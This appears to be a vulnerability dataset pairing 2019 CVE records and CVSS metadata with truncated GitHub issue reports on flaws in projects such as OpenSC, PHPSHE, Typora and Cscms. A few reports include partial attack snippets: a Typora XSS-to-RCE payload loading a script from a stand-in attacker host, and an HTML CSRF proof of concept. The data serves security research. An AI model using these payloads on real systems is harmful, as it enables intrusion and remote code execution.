https://github.com/labapart/gattlib/issues/82
401,071,786
82
54
CVE-2019-6502
2019-01-22T08:29:00.200
sc_context_create in ctx.c in libopensc in OpenSC 0.19.0 has a memory leak, as demonstrated by a call from eidenv.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": null, "url": "http://www.openwall.com/lists/oss-security/2019/12/29/1" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/OpenSC/OpenSC/issues/1586" }, ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensc_project:opensc:0.19.0:*:*:*:*:*:*:*", "matchCriteriaId": "A4EC94EC-2637-45D4-8F7E-857497B17B08", "versionEndExcluding": null, "versionEndIncluding": null, "versionStar...
[ "401" ]
401
https://github.com/OpenSC/OpenSC/issues/1586
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "OpenSC", "OpenSC" ]
Hi Team, I have build this repo using **clang** via ASAN, a **memory leak** was detected in `eidenv.c` **ASAN** ```c ==32025==ERROR: LeakSanitizer: detected memory leaks Direct leak of 632 byte(s) in 1 object(s) allocated from: #0 0x4d28d8 in calloc (/home/input0/Desktop/OpenSC/src/tools/.libs/eidenv+...
Memory leak
https://api.github.com/repos/OpenSC/OpenSC/issues/1586/comments
11
2019-01-20T17:08:17Z
2020-01-20T13:28:46Z
https://github.com/OpenSC/OpenSC/issues/1586
401,117,747
1,586
55
CVE-2019-6503
2019-01-22T14:29:00.563
There is a deserialization vulnerability in Chatopera cosin v3.10.0. An attacker can execute commands during server-side deserialization by uploading maliciously constructed files. This is related to the TemplateController.java impsave method and the MainUtils toObject method.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/chatopera/cosin/issues/177" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Pa...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:chatopera:cosin:3.10.0:*:*:*:*:*:*:*", "matchCriteriaId": "DC72B1B6-A924-47B8-84B3-663E7B700885", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclu...
[ "502" ]
502
https://github.com/chatopera/cosin/issues/177
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "chatopera", "cosin" ]
# 描述 您好,我是360代码卫士的工资人员,在我们的开源项目代码检测过程中,发现cosin中存在java反序列化漏洞,详细信息如下: ## 现在行为 在TemplateController.java文件的impsave方法中,85行处读取上传文件字节码,并调用了MainUtils工具类中的toObject方法 ![default](https://user-images.githubusercontent.com/39950310/51511210-50dbda00-1e3b-11e9-9dd4-3a1b948cf8fc.png) 跟进该方法中,发现直接对文件内容进行反序列化操作 ![default](https:...
反序列化漏洞
https://api.github.com/repos/cskefu/cskefu/issues/177/comments
1
2019-01-22T03:49:20Z
2022-10-30T10:26:33Z
https://github.com/cskefu/cskefu/issues/177
401,588,532
177
56
CVE-2019-6507
2019-01-22T16:29:00.677
An issue was discovered in creditease-sec insight through 2018-09-11. login_user_delete in srcpm/app/admin/views.py allows CSRF.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/creditease-sec/insight/issues/42" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://g...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:creditease-sec:insight:*:*:*:*:*:*:*:*", "matchCriteriaId": "422C1DF8-55B5-424A-9A5C-2B381B0C40EA", "versionEndExcluding": null, "versionEndIncluding": "2018-09-11", "version...
[ "352" ]
352
https://github.com/creditease-sec/insight/issues/42
[ "Exploit", "Third Party Advisory" ]
github.com
[ "creditease-sec", "insight" ]
vulnerability file: https://github.com/creditease-sec/insight/blob/open-source/srcpm/app/admin/views.py 1. line 61 ```python @admin.route('/login_user_delete/<id>') @permission_required('admin.login_user_delete') def login_user_delete(id): lg_user_del = LoginUser.query.get_or_404(id) db.session.delete(lg_use...
There are four CSRF vulnerability that can delete user and etc
https://api.github.com/repos/creditease-sec/insight/issues/42/comments
1
2019-01-22T13:59:31Z
2019-02-15T03:15:12Z
https://github.com/creditease-sec/insight/issues/42
401,777,236
42
57
CVE-2019-6707
2019-01-23T19:29:01.023
PHPSHE 1.7 has SQL injection via the admin.php?mod=product&act=state product_id[] parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTI...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kk98kk0/exploit/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Part...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:phpshe:phpshe:1.7:*:*:*:*:*:*:*", "matchCriteriaId": "5B418BD6-2C7D-440C-9BB0-6616569BA3B7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding"...
[ "89" ]
89
https://github.com/kk98kk0/exploit/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "kk98kk0", "exploit" ]
**1.Vulnerability describes** **Detection object:** (1) website name: PHPSHE CMS system V1.7 (2) website domain name: http://www.phpshe.com/ (3) the IP address: http://www.phpshe.com/down/phpshe1.7.rar (4) version: PHPSHE B2C system v1.7 (build 20180905 UTF8) **Detection time:** January 3, 2019 ...
PHPSHE1.7 admin.php SqlInjection Vulnerability
https://api.github.com/repos/kk98kk0/exploit/issues/1/comments
0
2019-01-03T12:49:43Z
2019-01-06T12:27:29Z
https://github.com/kk98kk0/exploit/issues/1
395,561,857
1
58
CVE-2019-6708
2019-01-23T19:29:01.523
PHPSHE 1.7 has SQL injection via the admin.php?mod=order state parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTI...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kk98kk0/exploit/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Part...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:phpshe:phpshe:1.7:*:*:*:*:*:*:*", "matchCriteriaId": "5B418BD6-2C7D-440C-9BB0-6616569BA3B7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding"...
[ "89" ]
89
https://github.com/kk98kk0/exploit/issues/2
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "kk98kk0", "exploit" ]
**Vulnerability description** Test object: (1) website: PHPSHE shopping system V1.7 (2) the website domain name: http://www.phpshe.com/ (3) IP address: http://www.phpshe.com/down/phpshe1.7.rar (4) version: PHPSHE B2C mall system v1.7 (build 20180905 UTF8) Detection time: January 6, 2019 **Vulnerab...
PHPSHE1.7 admin.php SqlInjection Vulnerability -2
https://api.github.com/repos/kk98kk0/exploit/issues/2/comments
0
2019-01-06T12:51:46Z
2019-01-06T12:51:46Z
https://github.com/kk98kk0/exploit/issues/2
396,255,557
2
59
CVE-2019-6719
2019-01-23T22:29:00.557
An issue has been found in libIEC61850 v1.3.1. There is a use-after-free in the getState function in mms/iso_server/iso_server.c, as demonstrated by examples/server_example_goose/server_example_goose.c and examples/server_example_61400_25/server_example_61400_25.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/mz-automation/libiec61850/issues/111" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mz-automation:libiec61850:1.3.1:*:*:*:*:*:*:*", "matchCriteriaId": "A3197989-9E64-49DA-875C-7EF8A7697B1B", "versionEndExcluding": null, "versionEndIncluding": null, "versionS...
[ "416" ]
416
https://github.com/mz-automation/libiec61850/issues/111
[ "Exploit", "Third Party Advisory" ]
github.com
[ "mz-automation", "libiec61850" ]
Hi Team, There is Heap Use After Free in server_example_goose and server_example_61400_25 Snip [server_example_goose.c](https://github.com/mz-automation/libiec61850/blob/v1.3/examples/server_example_goose/server_example_goose.c) [server_example_61400_25.c](https://github.com/mz-automation/libiec61850/blob/v1.3/exam...
Heap Use After Free in server_example_goose and server_example_61400_25
https://api.github.com/repos/mz-automation/libiec61850/issues/111/comments
2
2019-01-15T11:05:33Z
2019-03-25T22:01:16Z
https://github.com/mz-automation/libiec61850/issues/111
399,294,594
111
60
CVE-2018-20742
2019-01-24T05:29:00.753
An issue was discovered in UC Berkeley RISE Opaque before 2018-12-01. There is no boundary check on ocall_malloc. The return value could be a pointer to enclave memory. It could cause an arbitrary enclave memory write.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ucbrise/opaque/commit/5ddda15d89f5ac82f4416208c5319ace4aecdc36" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ucbrise:opaque:*:*:*:*:*:*:*:*", "matchCriteriaId": "3FFA46CC-CA6A-43D8-841A-2C7B17F7FCE6", "versionEndExcluding": "2018-12-01", "versionEndIncluding": null, "versionStartExc...
[ "787" ]
787
https://github.com/ucbrise/opaque/issues/66
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "ucbrise", "opaque" ]
```cpp // EDL void ocall_malloc(size_t size, [out] uint8_t **ret); // Implementation void ocall_malloc(size_t size, uint8_t **ret) { *ret = static_cast<uint8_t *>(malloc(size)); } ``` `uint8_t **ret` could be a pointer to memory in enclave. It could casue a arbitrary memory write in enclave. Fix: ...
Security: No boundary check on `ocall_malloc`
https://api.github.com/repos/mc2-project/opaque-sql/issues/66/comments
1
2018-12-01T08:19:39Z
2018-12-01T09:11:22Z
https://github.com/mc2-project/opaque-sql/issues/66
386,436,771
66
61
CVE-2019-6486
2019-01-24T05:29:00.907
Go before 1.10.8 and 1.11.x before 1.11.5 mishandles P-521 and P-384 elliptic curves, which allows attackers to cause a denial of service (CPU consumption) or possibly conduct ECDH private key recovery attacks.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00042.html" }, { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00060.html"...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:golang:go:*:*:*:*:*:*:*:*", "matchCriteriaId": "DC7FF63E-50BB-42D5-ACD6-1F5A9AD7E08D", "versionEndExcluding": "1.10.8", "versionEndIncluding": null, "versionStartExcluding": ...
[ "770" ]
770
https://github.com/golang/go/issues/29903
[ "Third Party Advisory" ]
github.com
[ "golang", "go" ]
A DoS vulnerability in the crypto/elliptic implementations of the P-521 and P-384 elliptic curves may let an attacker craft inputs that consume excessive amounts of CPU. These inputs might be delivered via TLS handshakes, X.509 certificates, JWT tokens, ECDH shares or ECDSA signatures. In some cases, if an ECDH priv...
crypto/elliptic: CPU DoS vulnerability affecting P-521 and P-384
https://api.github.com/repos/golang/go/issues/29903/comments
8
2019-01-23T21:47:29Z
2020-03-13T20:17:47Z
https://github.com/golang/go/issues/29903
402,444,291
29,903
62
CVE-2019-6777
2019-01-24T15:29:01.017
An issue was discovered in ZoneMinder v1.32.3. Reflected XSS exists in web/skins/classic/views/plugin.php via the zm/index.php?view=plugin pl parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ZoneMinder/zoneminder/issues/2436" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://g...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zoneminder:zoneminder:1.32.3:*:*:*:*:*:*:*", "matchCriteriaId": "E5A2481D-4A45-48A2-B7DE-86C7D161F6EA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStar...
[ "79" ]
79
https://github.com/ZoneMinder/zoneminder/issues/2436
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ZoneMinder", "zoneminder" ]
**Describe Your Environment** -ZoneMinder v1.32.3 **Describe the bug** Reflective XSS vulnerability **To Reproduce** ZoneMinder has one reflective XSS vulnerabilities 1.plugin.php line 106 The parameters in the request are accepted at 39 lines, and the page is output at 106 lines without verification. ![...
Reflective XSS vulnerability
https://api.github.com/repos/ZoneMinder/zoneminder/issues/2436/comments
3
2019-01-23T08:03:50Z
2019-01-24T20:23:21Z
https://github.com/ZoneMinder/zoneminder/issues/2436
402,115,314
2,436
63
CVE-2019-6779
2019-01-24T19:29:00.197
Cscms 4.1.8 allows admin.php/links/save CSRF to add, modify, or delete friend links.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/chshcms/cscms/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:chshcms:cscms:4.1.8:*:*:*:*:*:*:*", "matchCriteriaId": "A70E830D-724F-4B4C-A709-0DAAD326DC70", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
[ "352" ]
352
https://github.com/chshcms/cscms/issues/3
[ "Exploit", "Third Party Advisory" ]
github.com
[ "chshcms", "cscms" ]
just use add friend links for example: After the admin logged in, we can send him a url with these code on that page PoC: ```html <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost:9000/admin.php/links/save" method="POST"> <input type="hidden" name="...
There is a CSRF vulnerability that can add/modify/delete friend links
https://api.github.com/repos/chshcms/cscms/issues/3/comments
0
2019-01-24T14:51:59Z
2020-02-27T04:22:34Z
https://github.com/chshcms/cscms/issues/3
402,743,077
3
64
CVE-2019-6803
2019-01-25T05:29:00.903
typora through 0.9.9.20.3 beta has XSS, with resultant remote command execution, via the left outline bar.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/typora/typora-issues/issues/2124" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://g...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:typora:typora:0.8.1:alpha:*:*:*:*:*:*", "matchCriteriaId": "AC70FD56-1852-49ED-A76B-B7D3838D7F58", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcl...
[ "79" ]
79
https://github.com/typora/typora-issues/issues/2124
[ "Exploit", "Third Party Advisory" ]
github.com
[ "typora", "typora-issues" ]
The filtering rules on the left outline bar are not perfect. It will cause XSS,when the document has the following content, and then could raise to RCE: eg: ```markdown # 1 # \<script src=https://hacker_s_url/xss.js\>\</script\> ``` ```js //xss.js 's content var Process = process.binding('process_wrap').Pro...
Typora XSS to RCE
https://api.github.com/repos/typora/typora-issues/issues/2124/comments
1
2019-01-24T14:38:57Z
2019-01-25T13:47:37Z
https://github.com/typora/typora-issues/issues/2124
402,736,969
2,124
66
CVE-2019-6804
2019-01-25T05:29:00.950
An XSS issue was discovered on the Job Edit page in Rundeck Community Edition before 3.0.13, related to assets/javascripts/workflowStepEditorKO.js and views/execution/_wfitemEdit.gsp.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://docs.rundeck.com/docs/history/version-3.0.13.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/rundeck/rundeck/issues/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pagerduty:rundeck:*:*:*:*:community:*:*:*", "matchCriteriaId": "A788E9B1-4D67-4481-A11C-9BE9E2D519F0", "versionEndExcluding": "3.0.13", "versionEndIncluding": null, "versionS...
[ "79" ]
79
https://github.com/rundeck/rundeck/issues/4406
[ "Third Party Advisory" ]
github.com
[ "rundeck", "rundeck" ]
**Describe the bug** A stored XSS vulnerability exists in the Job Edit page **My Rundeck detail** * Rundeck version: 2.11, 3.0 * install type: any **To Reproduce** (forthcoming)
Security: stored XSS vulnerability
https://api.github.com/repos/rundeck/rundeck/issues/4406/comments
0
2019-01-22T21:38:39Z
2019-01-22T23:41:33Z
https://github.com/rundeck/rundeck/issues/4406
401,965,300
4,406
67
CVE-2018-20743
2019-01-25T16:29:00.260
murmur in Mumble through 1.2.19 before 2018-08-31 mishandles multiple concurrent requests that are persisted in the database, which allows remote attackers to cause a denial of service (daemon hang or crash) via a message flood.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00045.html" }, { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00023.html" }, { "source": "cve@mit...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mumble:mumble:*:*:*:*:*:*:*:*", "matchCriteriaId": "2AF7520D-3D90-45C5-8115-D2D047A96165", "versionEndExcluding": null, "versionEndIncluding": "1.2.19", "versionStartExcludin...
[ "20" ]
20
https://github.com/mumble-voip/mumble/issues/3505
[ "Patch", "Third Party Advisory" ]
github.com
[ "mumble-voip", "mumble" ]
Rate limiting
https://api.github.com/repos/mumble-voip/mumble/issues/3505/comments
6
2018-08-27T15:48:38Z
2019-04-02T18:39:46Z
https://github.com/mumble-voip/mumble/issues/3505
354,373,433
3,505
68
CVE-2019-6966
2019-01-25T23:29:00.237
An issue was discovered in Bento4 1.5.1-628. The AP4_ElstAtom class in Core/Ap4ElstAtom.cpp has an attempted excessive memory allocation related to AP4_Array<AP4_ElstEntry>::EnsureCapacity in Core/Ap4Array.h, as demonstrated by mp42hls.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/361" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https:...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1-628:*:*:*:*:*:*:*", "matchCriteriaId": "27A2EAA1-1740-4A14-BFFC-BD4406E9BD87", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "770" ]
770
https://github.com/axiomatic-systems/Bento4/issues/361
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
A crafted input will lead to failed allocate LargeMmapAllocator in Ap4Array.h at Bento4 1.5.1-628. Triggered by ./mp42hls crash3.mp4 Poc [poc1.zip](https://github.com/axiomatic-systems/Bento4/files/2795098/poc1.zip) Bento4 Version 1.5.1-628 The ASAN information is as follows: ``` ==56305==ERROR: Add...
failed to allocate LargeMmapAllocator in Ap4Array.h at Bento4 v1.5.1-628 when running mp42hls
https://api.github.com/repos/axiomatic-systems/Bento4/issues/361/comments
1
2019-01-25T07:49:22Z
2019-12-26T14:50:59Z
https://github.com/axiomatic-systems/Bento4/issues/361
403,042,062
361
69
CVE-2018-20744
2019-01-28T08:29:00.230
The Olivier Poitrey Go CORS handler through 1.3.0 actively converts a wildcard CORS policy into reflecting an arbitrary Origin header value, which is incompatible with the CORS security design, and could lead to CORS misconfiguration security problems.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "http://www.securityfocus.com/bid/106834" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rs/cors/issues/55" }, { "so...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:go_cors_project:go_cors:*:*:*:*:*:*:*:*", "matchCriteriaId": "83CDD84E-E81F-4256-B707-55259AD874F6", "versionEndExcluding": null, "versionEndIncluding": "1.3.0", "versionStar...
[ "346" ]
346
https://github.com/rs/cors/issues/55
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "rs", "cors" ]
When CORS policy is configured to origin:"*", current go CORS handler will actively convert it to reflect any Origin header value. This kind of behavior is dangerous and has caused many security problems in the past. Some similar security issues: https://github.com/cyu/rack-cors/issues/126 https://nodesecurity.io/...
CORS security: reflecting any origin header value when configured to * is dangerous
https://api.github.com/repos/rs/cors/issues/55/comments
6
2018-05-12T08:14:21Z
2018-05-24T05:45:51Z
https://github.com/rs/cors/issues/55
322,492,987
55
70
CVE-2018-20745
2019-01-28T08:29:00.527
Yii 2.x through 2.0.15.1 actively converts a wildcard CORS policy into reflecting an arbitrary Origin header value, which is incompatible with the CORS security design, and could lead to CORS misconfiguration security problems.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yiisoft/yii2/issues/16193" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.usenix.org/system/files/conference/us...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yiiframework:yii:*:*:*:*:*:*:*:*", "matchCriteriaId": "E86F5F96-5AF7-484F-BCD3-3EE7F73C4CB4", "versionEndExcluding": null, "versionEndIncluding": "2.0.15.1", "versionStartExc...
[ "346" ]
346
https://github.com/yiisoft/yii2/issues/16193
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yiisoft", "yii2" ]
When CORS policy is configured to *, current Yii2 CORS filter will actively convert it to reflect any Origin header value. This kind of behavior is dangerous and has caused many security problems in the past. Some similar security issues: [https://github.com/cyu/rack-cors/issues/126](https://github.com/cyu/rack-cor...
CORS security: reflecting any origin header value when configured to * is dangerous
https://api.github.com/repos/yiisoft/yii2/issues/16193/comments
4
2018-04-29T14:01:17Z
2018-05-01T08:02:43Z
https://github.com/yiisoft/yii2/issues/16193
318,719,387
16,193
71
CVE-2019-6978
2019-01-28T08:29:00.607
The GD Graphics Library (aka LibGD) 2.2.5 has a double free in the gdImage*Ptr() functions in gd_gif_out.c, gd_jpeg.c, and gd_wbmp.c. NOTE: PHP is unaffected.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00025.html" }, { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00031.html" }, { "source": "cve@mit...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libgd:libgd:2.2.5:*:*:*:*:*:*:*", "matchCriteriaId": "C257CC1C-BF6A-4125-AA61-9C2D09096084", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding"...
[ "415" ]
415
https://github.com/libgd/libgd/issues/492
[ "Patch", "Third Party Advisory" ]
github.com
[ "libgd", "libgd" ]
Hi, please commit the patch file.
Update gdImage*Ptr() functions for possible Double free bugs
https://api.github.com/repos/libgd/libgd/issues/492/comments
9
2019-01-15T11:09:33Z
2019-07-09T03:48:08Z
https://github.com/libgd/libgd/issues/492
399,296,066
492
72
CVE-2019-6988
2019-01-28T16:29:00.213
An issue was discovered in OpenJPEG 2.3.0. It allows remote attackers to cause a denial of service (attempted excessive memory allocation) in opj_calloc in openjp2/opj_malloc.c, when called from opj_tcd_init_tile in openjp2/tcd.c, as demonstrated by the 64-bit opj_decompress.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "http://www.securityfocus.com/bid/106785" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/uclouvain/openjpeg/issues/1178" }, { ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:uclouvain:openjpeg:2.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "459BFDFA-A27B-4C47-A966-9E99E022BD04", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "770" ]
770
https://github.com/uclouvain/openjpeg/issues/1178
[ "Exploit", "Third Party Advisory" ]
github.com
[ "uclouvain", "openjpeg" ]
I found a problem which will cause memory is exhausted, and program hang for 8 minutes. My test server had 112GB of memory. This can cause denial of service. ### Steps to Reproduce 1. Download and unzip [POC.zip] [POC.zip](https://github.com/uclouvain/openjpeg/files/2769058/POC.zip) 2. Run `opj_decompress -i POC...
memory exhauted and hangs long time when use 64bit opj_decompress (CVE-2019-6988)
https://api.github.com/repos/uclouvain/openjpeg/issues/1178/comments
15
2019-01-17T14:49:50Z
2023-11-02T02:39:27Z
https://github.com/uclouvain/openjpeg/issues/1178
400,311,428
1,178
73
CVE-2019-6990
2019-01-28T20:29:00.310
A stored-self XSS exists in web/skins/classic/views/zones.php of ZoneMinder through 1.32.3, allowing an attacker to execute HTML or JavaScript code in a vulnerable field via a crafted Zone NAME to the index.php?view=zones&action=zoneImage&mid=1 URI.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
